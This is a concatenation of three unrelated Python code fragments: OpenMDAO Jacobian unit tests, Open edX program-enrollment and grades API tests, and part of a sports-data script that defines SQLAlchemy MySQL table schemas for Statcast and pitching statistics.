outputs['z'] = np.array([3.0*inputs['x'][0]**3 + 4.0*inputs['y'][1]**2,
5.0*inputs['x'][1]**2 * inputs['y'][0]])
def compute_partials(self, inputs, partials):
partials['z', 'x'] = np.array([[9.0*inputs['x'][0]**2, 0.0], [0.0, 10.0*inputs['x'][1]*inputs['y'][0]]])
partials['z', 'y'] = np.array([[0.0, 8.0*inputs['y'][1]], [5.0*inputs['x'][1]**2, 0.0]])
class OverlappingPartialsTestCase(unittest.TestCase):
def test_repeated_src_indices_csc(self):
size = 2
p = Problem()
indeps = p.model.add_subsystem('indeps', IndepVarComp('x', np.ones(size)))
p.model.add_subsystem('C1', ExecComp('z=3.0*x[0]**3 + 2.0*x[1]**2', x=np.zeros(size)))
p.model.options['assembled_jac_type'] = 'csc'
p.model.linear_solver = DirectSolver(assemble_jac=True)
p.model.connect('indeps.x', 'C1.x', src_indices=[1,1])
p.setup()
p.run_model()
J = p.compute_totals(of=['C1.z'], wrt=['indeps.x'], return_format='array')
np.testing.assert_almost_equal(p.model._assembled_jac._int_mtx._matrix.toarray(),
np.array([[-1., 0., 0.],
[ 0., -1., 0.],
[ 0., 13., -1.]]))
def test_repeated_src_indices_dense(self):
size = 2
p = Problem()
indeps = p.model.add_subsystem('indeps', IndepVarComp('x', np.ones(size)))
p.model.add_subsystem('C1', ExecComp('z=3.0*x[0]**3 + 2.0*x[1]**2', x=np.zeros(size)))
p.model.options['assembled_jac_type'] = 'dense'
p.model.linear_solver = DirectSolver(assemble_jac=True)
p.model.connect('indeps.x', 'C1.x', src_indices=[1,1])
p.setup()
p.run_model()
J = p.compute_totals(of=['C1.z'], wrt=['indeps.x'], return_format='array')
np.testing.assert_almost_equal(p.model._assembled_jac._int_mtx._matrix,
np.array([[-1., 0., 0.],
[ 0., -1., 0.],
[ 0., 13., -1.]]))
def test_multi_inputs_same_src_dense_comp(self):
p = Problem()
indeps = p.model.add_subsystem('indeps', IndepVarComp('x', np.ones(2)))
p.model.add_subsystem('C1', MyDenseComp())
p.model.options['assembled_jac_type'] = 'csc'
p.model.linear_solver = DirectSolver(assemble_jac=True)
p.model.connect('indeps.x', ('C1.x', 'C1.y'))
p.setup()
p.run_model()
J = p.compute_totals(of=['C1.z'], wrt=['indeps.x'], return_format='array')
np.testing.assert_almost_equal(p.model._assembled_jac._int_mtx._matrix.toarray(),
np.array([[-1., 0., 0., 0.],
[ 0., -1., 0., 0.],
[ 9., 8., -1., 0.],
[ 5., 10., 0., -1.]]))
| |
"""
update = True
create = True
def request(self, path, data, **kwargs):
return self.client.put(path, data, format='json', **kwargs)
@ddt.ddt
class MultiprogramEnrollmentsTest(EnrollmentsDataMixin, APITestCase):
""" Tests for the Multiple Program with same course scenario """
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.another_curriculum_uuid = UUID('bbbbbbbb-8888-9999-7777-666666666666')
cls.another_curriculum = CurriculumFactory(
uuid=cls.another_curriculum_uuid,
courses=[cls.course]
)
cls.another_program_uuid = UUID(cls.program_uuid_tmpl.format(99))
cls.another_program = ProgramFactory(
uuid=cls.another_program_uuid,
authoring_organizations=[cls.catalog_org],
curricula=[cls.another_curriculum]
)
cls.external_user_key = 'aabbcc'
cls.user = UserFactory.create(username='multiprogram_user')
def setUp(self):
super().setUp()
self.set_program_in_catalog_cache(self.another_program_uuid, self.another_program)
self.client.login(username=self.global_staff.username, password=self.password)
def get_program_url(self, program_uuid):
return reverse('programs_api:v1:program_enrollments', kwargs={
'program_uuid': program_uuid
})
def get_program_course_url(self, program_uuid, course_id):
return reverse('programs_api:v1:program_course_enrollments', kwargs={
'program_uuid': program_uuid,
'course_id': course_id
})
def write_program_enrollment(
self,
method,
program_uuid,
curriculum_uuid,
enrollment_status,
existing_user
):
""" Create or update the program enrollment through API """
write_data = [{
'status': enrollment_status,
REQUEST_STUDENT_KEY: self.external_user_key,
'curriculum_uuid': str(curriculum_uuid)
}]
url = self.get_program_url(program_uuid=program_uuid)
mock_user = defaultdict(lambda: None)
if existing_user:
mock_user = {self.external_user_key: self.user}
with mock.patch(
_get_users_patch_path,
autospec=True,
return_value=mock_user,
):
response = getattr(self.client, method)(
url,
json.dumps(write_data),
content_type='application/json'
)
return response
def write_program_course_enrollment(
self,
method,
program_uuid,
course_id,
enrollment_status
):
""" Create or update the program course enrollment through API """
course_post_data = [{
'student_key': self.external_user_key,
'status': enrollment_status
}]
course_url = self.get_program_course_url(program_uuid, course_id)
response = getattr(self.client, method)(
course_url,
json.dumps(course_post_data),
content_type='application/json'
)
return response
def link_user_social_auth(self):
""" Create the UserSocialAuth record to trigger the linkage django signal """
SAMLProviderConfigFactory(
organization=self.lms_org,
slug=self.organization_key
)
UserSocialAuth.objects.create(
user=self.user,
uid=f'{self.organization_key}:{self.external_user_key}',
provider=self.organization_key
)
@ddt.data(True, False)
def test_enrollment_in_same_course_multi_program(self, existing_user):
response = self.write_program_enrollment(
'post', self.program_uuid, self.curriculum_uuid, 'enrolled', existing_user
)
assert response.status_code == status.HTTP_200_OK
response = self.write_program_course_enrollment(
'post', self.program_uuid, self.course_id, 'active'
)
assert response.status_code == status.HTTP_200_OK
response = self.write_program_enrollment(
'put', self.program_uuid, self.curriculum_uuid, 'canceled', existing_user
)
assert response.status_code == status.HTTP_200_OK
response = self.write_program_course_enrollment(
'put', self.program_uuid, self.course_id, 'inactive'
)
assert response.status_code == status.HTTP_200_OK
response = self.write_program_enrollment(
'post', self.another_program_uuid, self.another_curriculum_uuid, 'enrolled', existing_user
)
assert response.status_code == status.HTTP_200_OK
response = self.write_program_course_enrollment(
'post', self.another_program_uuid, self.course_id, 'active')
assert response.status_code == status.HTTP_200_OK
if not existing_user:
self.link_user_social_auth()
program_course_enrollment = ProgramCourseEnrollment.objects.get(
program_enrollment__external_user_key=self.external_user_key,
program_enrollment__program_uuid=self.another_program_uuid
)
assert program_course_enrollment.program_enrollment.user is not None
@ddt.data(True, False)
@mock.patch('lms.djangoapps.program_enrollments.api.writing.logger')
def test_enrollment_in_same_course_both_program_enrollments_active(self, existing_user, mock_log):
response = self.write_program_enrollment(
'post', self.program_uuid, self.curriculum_uuid, 'enrolled', existing_user
)
assert response.status_code == status.HTTP_200_OK
response = self.write_program_course_enrollment(
'post', self.program_uuid, self.course_id, 'active'
)
assert response.status_code == status.HTTP_200_OK
response = self.write_program_enrollment(
'post', self.another_program_uuid, self.another_curriculum_uuid, 'enrolled', existing_user
)
assert response.status_code == status.HTTP_200_OK
response = self.write_program_course_enrollment(
'post', self.another_program_uuid, self.course_id, 'active'
)
assert response.status_code == 422
mock_log.error.assert_called_with(
'Detected conflicting active ProgramCourseEnrollment. This is happening on'
' The program_uuid [{}] with course_key [{}] for external_user_key [{}]'.format(
self.another_program_uuid,
self.course_id,
self.external_user_key
)
)
expected_results = {self.external_user_key: CourseStatuses.CONFLICT}
self.assertDictEqual(expected_results, response.data)
class ProgramCourseGradesGetTests(EnrollmentsDataMixin, APITestCase):
"""
Tests for GET calls to the Program Course Grades API.
"""
view_name = 'programs_api:v1:program_course_grades'
def test_401_if_unauthenticated(self):
url = self.get_url(course_id=self.course_id)
response = self.client.get(url)
assert response.status_code == status.HTTP_401_UNAUTHORIZED
def test_403_if_not_staff(self):
self.log_in_non_staff()
url = self.get_url(course_id=self.course_id)
response = self.client.get(url)
assert response.status_code == status.HTTP_403_FORBIDDEN
def test_404_not_found(self):
fake_program_uuid = UUID(self.program_uuid_tmpl.format(99))
self.log_in_staff()
url = self.get_url(program_uuid=fake_program_uuid, course_id=self.course_id)
response = self.client.get(url)
assert response.status_code == status.HTTP_404_NOT_FOUND
def test_204_no_grades_to_return(self):
self.log_in_staff()
url = self.get_url(course_id=self.course_id)
with self.patch_grades_with({}):
response = self.client.get(url)
assert response.status_code == status.HTTP_204_NO_CONTENT
assert response.data['results'] == []
def test_200_grades_with_no_exceptions(self):
other_student = UserFactory.create(username='other_student')
self.create_program_and_course_enrollments('student-key', user=self.student)
self.create_program_and_course_enrollments('other-student-key', user=other_student)
mock_grades_by_user = {
self.student: (
self.mock_grade(),
None
),
other_student: (
self.mock_grade(percent=40.0, passed=False, letter_grade='F'),
None
),
}
self.log_in_staff()
url = self.get_url(course_id=self.course_id)
with self.patch_grades_with(mock_grades_by_user):
response = self.client.get(url)
assert response.status_code == status.HTTP_200_OK
expected_results = [
{
'student_key': 'student-key',
'passed': True,
'percent': 75.0,
'letter_grade': 'B',
},
{
'student_key': 'other-student-key',
'passed': False,
'percent': 40.0,
'letter_grade': 'F',
},
]
assert response.data['results'] == expected_results
def test_207_grades_with_some_exceptions(self):
other_student = UserFactory.create(username='other_student')
self.create_program_and_course_enrollments('student-key', user=self.student)
self.create_program_and_course_enrollments('other-student-key', user=other_student)
mock_grades_by_user = {
self.student: (None, Exception('Bad Data')),
other_student: (
self.mock_grade(percent=40.0, passed=False, letter_grade='F'),
None,
),
}
self.log_in_staff()
url = self.get_url(course_id=self.course_id)
with self.patch_grades_with(mock_grades_by_user):
response = self.client.get(url)
assert response.status_code == status.HTTP_207_MULTI_STATUS
expected_results = [
{
'student_key': 'student-key',
'error': 'Bad Data',
},
{
'student_key': 'other-student-key',
'passed': False,
'percent': 40.0,
'letter_grade': 'F',
},
]
assert response.data['results'] == expected_results
def test_422_grades_with_only_exceptions(self):
other_student = UserFactory.create(username='other_student')
self.create_program_and_course_enrollments('student-key', user=self.student)
self.create_program_and_course_enrollments('other-student-key', user=other_student)
mock_grades_by_user = {
self.student: (None, Exception('Bad Data')),
other_student: (None, Exception('Timeout')),
}
self.log_in_staff()
url = self.get_url(course_id=self.course_id)
with self.patch_grades_with(mock_grades_by_user):
response = self.client.get(url)
assert response.status_code == status.HTTP_422_UNPROCESSABLE_ENTITY
expected_results = [
{
'student_key': 'student-key',
'error': 'Bad Data',
},
{
'student_key': 'other-student-key',
'error': 'Timeout',
},
]
assert response.data['results'] == expected_results
@staticmethod
def patch_grades_with(grades_by_user):
"""
Create a patcher the CourseGradeFactory to use the `grades_by_user`
to determine the grade for each user.
Arguments:
grades_by_user: dict[User: (CourseGrade, Exception)]
"""
def patched_iter(self, users, course_key): # pylint: disable=unused-argument
return [
(user, grades_by_user[user][0], grades_by_user[user][1])
for user in users
]
return mock.patch.object(CourseGradeFactory, 'iter', new=patched_iter)
@staticmethod
def mock_grade(percent=75.0, passed=True, letter_grade='B'):
return mock.MagicMock(percent=percent, passed=passed, letter_grade=letter_grade)
@ddt.ddt
class UserProgramReadOnlyAccessGetTests(EnrollmentsDataMixin, APITestCase):
"""
Tests for the UserProgramReadonlyAccess view class
"""
view_name = 'programs_api:v1:user_program_readonly_access'
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.mock_program_data = [
{'uuid': cls.program_uuid_tmpl.format(11), 'marketing_slug': 'garbage-program', 'type': 'masters'},
{'uuid': cls.program_uuid_tmpl.format(22), 'marketing_slug': 'garbage-study', 'type': 'micromaster'},
{'uuid': cls.program_uuid_tmpl.format(33), 'marketing_slug': 'garbage-life', 'type': 'masters'},
]
cls.course_staff = InstructorFactory.create(password=<PASSWORD>, course_key=cls.course_id)
cls.date = timezone.make_aware(datetime(2013, 1, 22))
CourseEnrollmentFactory(
course_id=cls.course_id,
user=cls.course_staff,
created=cls.date,
)
def test_401_if_anonymous(self):
response = self.client.get(reverse(self.view_name))
assert status.HTTP_401_UNAUTHORIZED == response.status_code
@ddt.data(
('masters', 2),
('micromaster', 1)
)
@ddt.unpack
def test_global_staff(self, program_type, expected_data_size):
self.client.login(username=self.global_staff.username, password=self.password)
mock_return_value = [program for program in self.mock_program_data if program['type'] == program_type]
with mock.patch(
_VIEW_PATCH_FORMAT.format('get_programs_by_type'),
autospec=True,
return_value=mock_return_value
) as mock_get_programs_by_type:
response = self.client.get(reverse(self.view_name) + '?type=' + program_type)
assert status.HTTP_200_OK == response.status_code
assert len(response.data) == expected_data_size
mock_get_programs_by_type.assert_called_once_with(response.wsgi_request.site, program_type)
def test_course_staff(self):
self.client.login(username=self.course_staff.username, password=self.password)
with mock.patch(
_VIEW_PATCH_FORMAT.format('get_programs'),
autospec=True,
side_effect=[[self.mock_program_data[0]], []]
) as mock_get_programs:
response = self.client.get(reverse(self.view_name) + '?type=masters')
assert status.HTTP_200_OK == response.status_code
assert len(response.data) == 1
mock_get_programs.assert_has_calls([
mock.call(course=self.course_id),
mock.call(uuids=[]),
], any_order=True)
def _enroll_user_into_course_as_course_staff(self, user, course_key_string):
"""
This is a helper function to create a course run based on the course key string,
then enroll the user to the course run as a course staff.
"""
course_key_to_create = CourseKey.from_string(course_key_string)
CourseOverviewFactory(id=course_key_to_create)
CourseRunFactory.create(key=str(course_key_to_create))
CourseEnrollmentFactory.create(course_id=course_key_to_create, user=user)
CourseStaffRole(course_key_to_create).add_users(user)
return course_key_to_create
@ddt.data(
(
['garbage-program'],
['garbage-life']
),
(
['garbage-program', 'garbage-life'],
['garbage-program', 'garbage-life']
)
)
@ddt.unpack
def test_course_staff_of_multiple_courses(
self,
program_slugs_to_return_first,
program_slugs_to_return_second
):
def find_program_by_marketing_slug(slug, program_list):
for program in program_list:
if program['marketing_slug'] == slug:
return program
return None
other_course_key = self._enroll_user_into_course_as_course_staff(
self.course_staff,
'course-v1:edX+ToyX+Other_Course'
)
self.client.login(username=self.course_staff.username, password=<PASSWORD>)
programs_to_return_first = [
find_program_by_marketing_slug(
p_slug,
self.mock_program_data
) for p_slug in program_slugs_to_return_first
]
programs_to_return_second = [
find_program_by_marketing_slug(
p_slug,
self.mock_program_data
) for p_slug in program_slugs_to_return_second
]
with mock.patch(
_VIEW_PATCH_FORMAT.format('get_programs'),
autospec=True,
side_effect=[[], programs_to_return_first, programs_to_return_second]
) as mock_get_programs:
response = self.client.get(reverse(self.view_name) + '?type=masters')
assert status.HTTP_200_OK == response.status_code
assert len(response.data) == 2
mock_get_programs.assert_has_calls([
mock.call(course=self.course_id),
mock.call(course=other_course_key),
], any_order=True)
def test_course_staff_of_non_program_course(self):
created_course_key = self._enroll_user_into_course_as_course_staff(
self.student,
'course-v1:edX+ToyX+Other_Course'
)
program_to_enroll = self.mock_program_data[0]
ProgramEnrollmentFactory.create(
program_uuid=program_to_enroll['uuid'],
curriculum_uuid=self.curriculum_uuid,
user=self.student,
status='enrolled',
external_user_key=f'user-{self.student.id}',
)
self.client.login(username=self.student.username, password=<PASSWORD>)
with mock.patch(
_VIEW_PATCH_FORMAT.format('get_programs'),
autospec=True,
side_effect=[[], [program_to_enroll]]
) as mock_get_programs:
response = self.client.get(reverse(self.view_name))
assert status.HTTP_200_OK == response.status_code
assert len(response.data) == 1
mock_get_programs.assert_has_calls([
mock.call(course=created_course_key),
mock.call(uuids=[UUID(program_to_enroll['uuid'])]),
])
@mock.patch(_VIEW_PATCH_FORMAT.format('get_programs'), autospec=True, return_value=None)
def test_learner_200_if_no_programs_enrolled(self, mock_get_programs):
self.client.login(username=self.student.username, password=self.password)
response = self.client.get(reverse(self.view_name))
assert status.HTTP_200_OK == response.status_code
assert response.data == []
mock_get_programs.assert_called_once_with(uuids=[])
def test_learner_200_many_programs(self):
for program in self.mock_program_data:
ProgramEnrollmentFactory.create(
program_uuid=program['uuid'],
curriculum_uuid=self.curriculum_uuid,
user=self.student,
status='pending',
external_user_key=f'user-{self.student.id}',
)
self.client.login(username=self.student.username, password=self.password)
with mock.patch(
_VIEW_PATCH_FORMAT.format('get_programs'),
autospec=True,
return_value=self.mock_program_data
) as mock_get_programs:
response = self.client.get(reverse(self.view_name))
assert status.HTTP_200_OK == response.status_code
assert len(response.data) == 3
mock_get_programs.assert_called_once_with(uuids=[UUID(item['uuid']) for item in self.mock_program_data])
@ddt.ddt
class ProgramCourseEnrollmentOverviewGetTests(
ProgramCacheMixin,
SharedModuleStoreTestCase,
APITestCase
):
"""
Tests for the ProgramCourseEnrollmentOverview view GET method.
"""
patch_resume_url = mock.patch(
_UTILS_PATCH_FORMAT.format('get_resume_urls_for_enrollments'),
autospec=True,
)
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.program_uuid = '00000000-1111-2222-3333-444444444444'
cls.curriculum_uuid = 'aaaaaaaa-1111-2222-3333-444444444444'
cls.other_curriculum_uuid = 'bbbbbbbb-1111-2222-3333-444444444444'
cls.course_id = CourseKey.from_string('course-v1:edX+ToyX+Toy_Course')
cls.course_run = CourseRunFactory.create(key=str(cls.course_id))
cls.course = CourseFactory.create(course_runs=[cls.course_run])
cls.username = 'student'
cls.password = 'password'
cls.student = UserFactory.create(username=cls.username, password=<PASSWORD>)
# only freeze time when defining these values and not on the whole test case
# as test_multiple_enrollments_all_enrolled relies on actual differences in modified datetimes
with freeze_time('2019-01-01'):
cls.yesterday = timezone.now() - timedelta(1)
cls.tomorrow = timezone.now() + timedelta(1)
cls.modulestore_course = ModulestoreCourseFactory.create(
org="edX",
course="ToyX",
run="Toy_Course",
start=cls.yesterday,
end=cls.tomorrow,
)
cls.relative_certificate_download_url = '/download-the-certificates'
cls.absolute_certificate_download_url = 'http://www.certificates.com/'
# create program enrollment
cls.program_enrollment = ProgramEnrollmentFactory.create(
program_uuid=cls.program_uuid,
curriculum_uuid=cls.curriculum_uuid,
user=cls.student,
)
# create course overview
cls.course_overview = CourseOverviewFactory.create(
id=cls.course_id,
start=cls.yesterday,
end=cls.tomorrow,
)
# create course enrollment
cls.course_enrollment = CourseEnrollmentFactory.create(
course=cls.course_overview,
user=cls.student,
mode=CourseMode.MASTERS,
)
# create program course enrollment
cls.program_course_enrollment = ProgramCourseEnrollmentFactory.create(
program_enrollment=cls.program_enrollment,
course_enrollment=cls.course_enrollment,
course_key=cls.course_id,
status='active',
)
# create program
catalog_org = OrganizationFactory(key='organization_key')
cls.program = ProgramFactory(
uuid=cls.program_uuid,
authoring_organizations=[catalog_org],
)
cls.program['curricula'][0]['courses'].append(cls.course)
def setUp(self):
super().setUp()
self.set_program_in_catalog_cache(self.program_uuid, self.program)
def create_generated_certificate(self, download_url=None):
return GeneratedCertificateFactory.create(
user=self.student,
course_id=self.course_id,
status=CertificateStatuses.downloadable,
mode='verified',
download_url=(download_url or self.relative_certificate_download_url),
grade="0.88",
verify_uuid=uuid4(),
)
def log_in(self, user=None):
"""
Log in `self.client` as `user` | |
<reponame>BenikaH/sportscraper<filename>sportscraper/scripts/db_connector.py<gh_stars>0
from sqlalchemy import *
import click
def upload_block(data, db_engine, db_tablename):
data.to_sql(db_tablename, con=db_engine, if_exists='append', index=False, chunksize=10000)
def initdb_statcast(db_username, db_password, db_hostname, db_name, db_tablename):
db_password = ":" + db_password
statcast_engine = create_engine("mysql+mysqldb://" + db_username + db_password + "@" + db_hostname + "/" + db_name)
meta = MetaData(bind=statcast_engine)
table_statcast = Table(db_tablename, meta,
Column("id", Integer, primary_key=True, autoincrement=True, nullable=False),
Column("index", Integer, nullable=True),
Column("sz_bot", Float, nullable=True),
Column("inning", Float, nullable=True),
Column("pitch_number", Float, nullable=True),
Column("hit_distance_sc", Float, nullable=True),
Column("plate_z", Float, nullable=True),
Column("plate_x", Float, nullable=True),
Column("umpire", Float, nullable=True),
Column("pitch_type", String(512), nullable=True),
Column("spin_rate_deprecated", Float, nullable=True),
Column("pos8_person_id", Float, nullable=True),
Column("pos6_person_id", Float, nullable=True),
Column("pos2_person_id.1", Float, nullable=True),
Column("on_3b", Float, nullable=True),
Column("release_pos_y", Float, nullable=True),
Column("pos2_person_id", Float, nullable=True),
Column("launch_speed", Float, nullable=True),
Column("ay", Float, nullable=True),
Column("ax", Float, nullable=True),
Column("az", Float, nullable=True),
Column("p_throws", String(512), nullable=True),
Column("release_speed", Float, nullable=True),
Column("break_length_deprecated", Float, nullable=True),
Column("at_bat_number", Float, nullable=True),
Column("vy0", Float, nullable=True),
Column("away_team", String(512), nullable=True),
Column("player_name", String(512), nullable=True),
Column("zone", Float, nullable=True),
Column("pos7_person_id", Float, nullable=True),
Column("babip_value", Float, nullable=True),
Column("bb_type", String(512), nullable=True),
Column("release_spin_rate", Float, nullable=True),
Column("effective_speed", Float, nullable=True),
Column("pos3_person_id", Float, nullable=True),
Column("hc_y", Float, nullable=True),
Column("inning_topbot", String(512), nullable=True),
Column("release_extension", Float, nullable=True),
Column("on_1b", Float, nullable=True),
Column("pos1_person_id", Float, nullable=True),
Column("hit_location", Float, nullable=True),
Column("release_pos_x", Float, nullable=True),
Column("events", String(512), nullable=True),
Column("release_pos_z", Float, nullable=True),
Column("game_year", Float, nullable=True),
Column("pos4_person_id", Float, nullable=True),
Column("woba_value", Float, nullable=True),
Column("description", String(512), nullable=True),
Column("pfx_z", Float, nullable=True),
Column("launch_angle", Float, nullable=True),
Column("pitcher", Float, nullable=True),
Column("strikes", Float, nullable=True),
Column("pos9_person_id", Float, nullable=True),
Column("batter", Float, nullable=True),
Column("pfx_x", Float, nullable=True),
Column("hc_x", Float, nullable=True),
Column("on_2b", Float, nullable=True),
Column("game_pk", Float, nullable=True),
Column("spin_dir", Float, nullable=True),
Column("iso_value", Float, nullable=True),
Column("woba_denom", Float, nullable=True),
Column("home_team", String(512), nullable=True),
Column("balls", Float, nullable=True),
Column("estimated_ba_using_speedangle", Float, nullable=True),
Column("estimated_woba_using_speedangle", Float, nullable=True),
Column("type", String(512), nullable=True),
Column("tfs_deprecated", Float, nullable=True),
Column("des", String(512), nullable=True),
Column("game_type", String(512), nullable=True),
Column("outs_when_up", Float, nullable=True),
Column("vx0", Float, nullable=True),
Column("sz_top", Float, nullable=True),
Column("launch_speed_angle", Float, nullable=True),
Column("stand", String(512), nullable=True),
Column("game_date", DateTime, nullable=True),
Column("break_angle_deprecated", Float, nullable=True),
Column("vz0", Float, nullable=True),
Column("sv_id", String(512), nullable=True),
Column("tfs_zulu_deprecated", Float, nullable=True),
Column("pos5_person_id", Float, nullable=True), extend_existing=True)
meta.create_all(statcast_engine)
return statcast_engine
def initdb_brooks(db_username, db_password, db_hostname, db_name, db_tablename):
db_password = ":" + <PASSWORD>
brooks_engine = create_engine("mysql+mysqldb://" + db_username + db_password + "@" + db_hostname + "/" + db_name)
meta = MetaData(bind=brooks_engine)
table_brooks = Table(db_tablename, meta,
Column("id", Integer, primary_key=True, autoincrement=True, nullable=False),
Column("inning", Integer, nullable=True),
Column("y0", Integer, nullable=True),
Column("pitcher_team", String(512), nullable=True),
Column("start_speed", Float, nullable=True),
Column("play_guid", String(512), nullable=True),
Column("pfx_zdatafile", Float, nullable=True),
Column("z0", Float, nullable=True),
Column("ab_id", Integer, nullable=True),
Column("pitcher_id", Integer, nullable=True),
Column("ay", Float, nullable=True),
Column("zone_location", Float, nullable=True),
Column("pxold", Float, nullable=True),
Column("batter_id", Integer, nullable=True),
Column("p_throws", String(512), nullable=True),
Column("park_sv_id", String(512), nullable=True),
Column("vy0", Float, nullable=True),
Column("az", Float, nullable=True),
Column("ab_count", Integer, nullable=True),
Column("pz", Float, nullable=True),
Column("spin", Float, nullable=True),
Column("px", Float, nullable=True),
Column("pfx_xdatafile", Float, nullable=True),
Column("date_stamp", String(512), nullable=True),
Column("gid", String(512), nullable=True),
Column("ftime", Float, nullable=True),
Column("tstart", Float, nullable=True),
Column("uncorrected_pfx_x", Float, nullable=True),
Column("uncorrected_pfx_z", Float, nullable=True),
Column("type", String(512), nullable=True),
Column("sz_bot", Float, nullable=True),
Column("norm_ht", Float, nullable=True),
Column("pfx_z", Float, nullable=True),
Column("strikes", Integer, nullable=True),
Column("mlbam_pitch_name", String(512), nullable=True),
Column("pitch_con", Float, nullable=True),
Column("pfx_x", Float, nullable=True),
Column("vystart", Float, nullable=True),
Column("ab_total", Integer, nullable=True),
Column("pdes", String(512), nullable=True),
Column("balls", Integer, nullable=True),
Column("des", String(512), nullable=True),
Column("x0", Float, nullable=True),
Column("ax", Float, nullable=True),
Column("sz_top", Float, nullable=True),
Column("stand", String(512), nullable=True),
Column("sb", Integer, nullable=True),
Column("vz0", Float, nullable=True),
Column("pzold", Float, nullable=True),
Column("vx0", Float, nullable=True))
meta.create_all(brooks_engine)
return brooks_engine
def initdb_pitching(db_username, db_password, db_hostname, db_name, db_tablename):
db_password = ":" + db_password
pitching_engine = create_engine("mysql+mysqldb://" + db_username + db_password + "@" + db_hostname + "/" + db_name)
meta = MetaData(bind=pitching_engine)
table_pitching = Table(db_tablename, meta,
*[Column("Name", String(512), nullable=True),
Column("Team", String(512), nullable=True),
Column("Age", Float, nullable=True),
Column("ERA", Float, nullable=True),
Column("UN (pfx)", Float, nullable=True),
Column("wCH (pi)", Float, nullable=True),
Column("KC-X (pfx)", Float, nullable=True),
Column("FC-Z (pfx)", Float, nullable=True),
Column("BB", Float, nullable=True),
Column("wKN", Float, nullable=True),
Column("wCH/C (pfx)", Float, nullable=True),
Column("wKC (pfx)", Float, nullable=True),
Column("BK", Float, nullable=True),
Column("wCH/C (pi)", Float, nullable=True),
Column("BU", Float, nullable=True),
Column("FC-Z (pi)", Float, nullable=True),
Column("BB/9", Float, nullable=True),
Column("Oppo", Float, nullable=True),
Column("vSC (pfx)", Float, nullable=True),
Column("WP", Float, nullable=True),
Column("wSL (pfx)", Float, nullable=True),
Column("wCU (pfx)", Float, nullable=True),
Column("SF", Float, nullable=True),
Column("HBP", Float, nullable=True),
Column("pLI", Float, nullable=True),
Column("FA-X (pi)", Float, nullable=True),
Column("vSI (pi)", Float, nullable=True),
Column("E-F", Float, nullable=True),
Column("FS (pi)", Float, nullable=True),
Column("CH", Float, nullable=True),
Column("Zone", Float, nullable=True),
Column("RS", Float, nullable=True),
Column("SL-Z (pfx)", Float, nullable=True),
Column("wFC/C (pi)", Float, nullable=True),
Column("KN", Float, nullable=True),
Column("wFC (pfx)", Float, nullable=True),
Column("wSL", Float, nullable=True),
Column("Strikes", Float, nullable=True),
Column("GB/FB", Float, nullable=True),
Column("RAR", Float, nullable=True),
Column("wSI (pfx)", Float, nullable=True),
Column("FS-X (pfx)", Float, nullable=True),
Column("SI-X (pi)", Float, nullable=True),
Column("SL-X (pfx)", Float, nullable=True),
Column("SB-Z (pi)", Float, nullable=True),
Column("vFA (pi)", Float, nullable=True),
Column("vFC (pfx)", Float, nullable=True),
Column("FIP", Float, nullable=True),
Column("GS", Float, nullable=True),
Column("CS (pi)", Float, nullable=True),
Column("Relief-IP", Float, nullable=True),
Column("Med", Float, nullable=True),
Column("SFv", Float, nullable=True),
Column("H", Float, nullable=True),
Column("SB (pi)", Float, nullable=True),
Column("L", Float, nullable=True),
Column("KN (pfx)", Float, nullable=True),
Column("wFA/C (pfx)", Float, nullable=True),
Column("FO (pfx)", Float, nullable=True),
Column("GB", Float, nullable=True),
Column("Swing (pfx)", Float, nullable=True),
Column("vEP (pfx)", Float, nullable=True),
Column("wCH (pfx)", Float, nullable=True),
Column("wKN/C (pfx)", Float, nullable=True),
Column("vFT (pfx)", Float, nullable=True),
Column("FA-Z (pi)", Float, nullable=True),
Column("SC (pfx)", Float, nullable=True),
Column("CH-Z (pi)", Float, nullable=True),
Column("CH (pi)", Float, nullable=True),
Column("wCT", Float, nullable=True),
Column("FDP-Wins", Float, nullable=True),
Column("FT (pfx)", Float, nullable=True),
Column("KN (pi)", Float, nullable=True),
Column("ERA-", Float, nullable=True),
Column("wKN/C", Float, nullable=True),
Column("BUH", Float, nullable=True),
Column("wCB", Float, nullable=True),
Column("wFC/C (pfx)", Float, nullable=True),
Column("Z-Contact (pfx)", Float, nullable=True),
Column("CHv", Float, nullable=True),
Column("CH-X (pfx)", Float, nullable=True),
Column("KNv", Float, nullable=True),
Column("wCH", Float, nullable=True),
Column("wCB/C", Float, nullable=True),
Column("SL-X (pi)", Float, nullable=True),
Column("ShO", Float, nullable=True),
Column("vCS (pi)", Float, nullable=True),
Column("SIERA", Float, nullable=True),
Column("Pace (pi)", Float, nullable=True),
Column("FB", Float, nullable=True),
Column("CB", Float, nullable=True),
Column("HR", Float, nullable=True),
Column("FA (pi)", Float, nullable=True),
Column("BS", Float, nullable=True),
Column("wFB/C", Float, nullable=True),
Column("KC (pfx)", Float, nullable=True),
Column("tERA", Float, nullable=True),
Column("EP-Z (pfx)", Float, nullable=True),
Column("K/9", Float, nullable=True),
Column("FC (pi)", Float, nullable=True),
Column("FS-Z (pfx)", Float, nullable=True),
Column("wSC/C (pfx)", Float, nullable=True),
Column("IFH", Float, nullable=True),
Column("EP-X (pfx)", Float, nullable=True),
Column("EP (pfx)", Float, nullable=True),
Column("H/9", Float, nullable=True),
Column("wFC (pi)", Float, nullable=True),
Column("wKN (pfx)", Float, nullable=True),
Column("G", Float, nullable=True),
Column("CU-X (pi)", Float, nullable=True),
Column("Soft", Float, nullable=True),
Column("Season", Float, nullable=True),
Column("wEP/C (pfx)", Float, nullable=True),
Column("vSL (pi)", Float, nullable=True),
Column("Hard", Float, nullable=True),
Column("SwStr", Float, nullable=True),
Column("FS (pfx)", Float, nullable=True),
Column("kwERA", Float, nullable=True),
Column("BUH", Float, nullable=True),
Column("wFT (pfx)", Float, nullable=True),
Column("vCU (pi)", Float, nullable=True),
Column("wSB/C (pi)", Float, nullable=True),
Column("LOB-Wins", Float, nullable=True),
Column("HR/FB", Float, nullable=True),
Column("SI-Z (pi)", Float, nullable=True),
Column("wXX (pi)", Float, nullable=True),
Column("SC-X (pfx)", Float, nullable=True),
Column("wCS (pi)", Float, nullable=True),
Column("Age Rng", String(512), nullable=True),
Column("SL (pi)", Float, nullable=True),
Column("CS-X (pi)", Float, nullable=True),
Column("wSI/C (pfx)", Float, nullable=True),
Column("wCU (pi)", Float, nullable=True),
Column("wFS/C (pfx)", Float, nullable=True),
Column("wEP (pfx)", Float, nullable=True),
Column("LD", Float, nullable=True),
Column("Clutch", Float, nullable=True),
Column("Dollars", String(512), nullable=True),
Column("wSF/C", Float, nullable=True),
